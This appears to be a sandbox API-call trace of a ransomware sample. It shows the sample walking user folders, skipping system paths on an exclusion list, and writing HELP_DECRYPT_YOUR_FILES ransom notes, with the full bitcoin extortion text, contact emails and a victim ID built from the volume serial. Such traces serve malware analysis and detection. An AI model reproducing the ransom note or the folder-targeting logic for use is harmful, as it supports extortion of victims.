	[0179.612] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.612] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.612] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.612] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="webcache") returned 0x0
	[0179.612] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.612] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="inetcache") returned 0x0
	[0179.613] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.613] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="nvidia") returned 0x0
	[0179.613] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.613] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="packages") returned 0x0
	[0179.613] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.613] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="cookies") returned 0x0
	[0179.613] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.614] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="programdata") returned 0x0
	[0179.614] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.614] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.614] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8494e39b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.614] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.614] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8494e39b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8494e39b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8494e39b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.614] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8492628f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8492628f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8494e39b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.615] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8492628f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8492628f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8494e39b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0179.615] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.615] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.615] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0179.615] lstrcmpW (lpString1="Documents", lpString2="..") returned 1
	[0179.616] lstrcmpW (lpString1="Documents", lpString2=".") returned 1
	[0179.616] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.616] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.616] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents"
	[0179.616] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents"
	[0179.616] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\"
	[0179.616] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Documents\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\"
	[0179.616] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*"
	[0179.616] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*" (normalized: "c:\\users\\default\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0179.621] lstrlenW (lpString="C:\\Users\\Default\\Documents\\*.*") returned 30
	[0179.621] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.621] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Documents\\*.*", cchLength=0x1e | out: lpsz="c:\\users\\default\\documents\\*.*") returned 0x1e
	[0179.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.622] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="windows") returned 0x0
	[0179.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.622] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="boot") returned 0x0
	[0179.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.622] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="system volume information") returned 0x0
	[0179.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.622] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.623] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="temp") returned 0x0
	[0179.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.623] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="program files") returned 0x0
	[0179.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.623] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.623] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="appdata") returned 0x0
	[0179.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.624] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="application data") returned 0x0
	[0179.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.624] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="winnt") returned 0x0
	[0179.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.624] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="tmp") returned 0x0
	[0179.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.624] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="cache") returned 0x0
	[0179.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.625] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.625] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="webcache") returned 0x0
	[0179.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.625] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="inetcache") returned 0x0
	[0179.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.626] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="nvidia") returned 0x0
	[0179.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.626] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="packages") returned 0x0
	[0179.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.627] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="cookies") returned 0x0
	[0179.627] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.627] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="programdata") returned 0x0
	[0179.627] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.627] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1
	[0179.627] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0179.627] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0179.628] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d527734, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0
	[0179.628] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0179.630] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0179.631] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents"
	[0179.631] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\*.*") returned="C:\\Users\\Default\\Documents\\*.*"
	[0179.631] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.631] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.631] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 54
	[0179.631] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.634] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.635] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.638] CloseHandle (hObject=0x380) returned 1
	[0179.638] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.639] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.640] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.640] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.640] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.640] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.640] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.642] CloseHandle (hObject=0x380) returned 1
	[0179.643] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.643] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.643] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.643] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 55
	[0179.643] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.646] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.646] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.648] CloseHandle (hObject=0x380) returned 1
	[0179.649] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.649] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.649] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.650] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.651] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.651] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.651] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.652] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.652] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.652] CloseHandle (hObject=0x380) returned 1
	[0179.652] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*" (normalized: "c:\\users\\default\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x849be8cf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.652] lstrlenW (lpString="C:\\Users\\Default\\Documents\\*.*") returned 30
	[0179.653] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.653] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Documents\\*.*", cchLength=0x1e | out: lpsz="c:\\users\\default\\documents\\*.*") returned 0x1e
	[0179.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.653] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="windows") returned 0x0
	[0179.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.653] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="boot") returned 0x0
	[0179.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.654] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="system volume information") returned 0x0
	[0179.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.654] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.654] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="temp") returned 0x0
	[0179.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.655] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="program files") returned 0x0
	[0179.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.655] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.655] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="appdata") returned 0x0
	[0179.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.656] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="application data") returned 0x0
	[0179.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.656] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="winnt") returned 0x0
	[0179.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.656] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="tmp") returned 0x0
	[0179.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.663] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="cache") returned 0x0
	[0179.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.663] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.664] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="webcache") returned 0x0
	[0179.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.664] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="inetcache") returned 0x0
	[0179.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.664] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="nvidia") returned 0x0
	[0179.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.665] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="packages") returned 0x0
	[0179.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.665] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="cookies") returned 0x0
	[0179.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.665] StrStrW (lpFirst="c:\\users\\default\\documents\\*.*", lpSrch="programdata") returned 0x0
	[0179.665] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.665] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.665] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x849be8cf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.666] lstrcmpW (lpString1="..", lpString2="..") returned 0
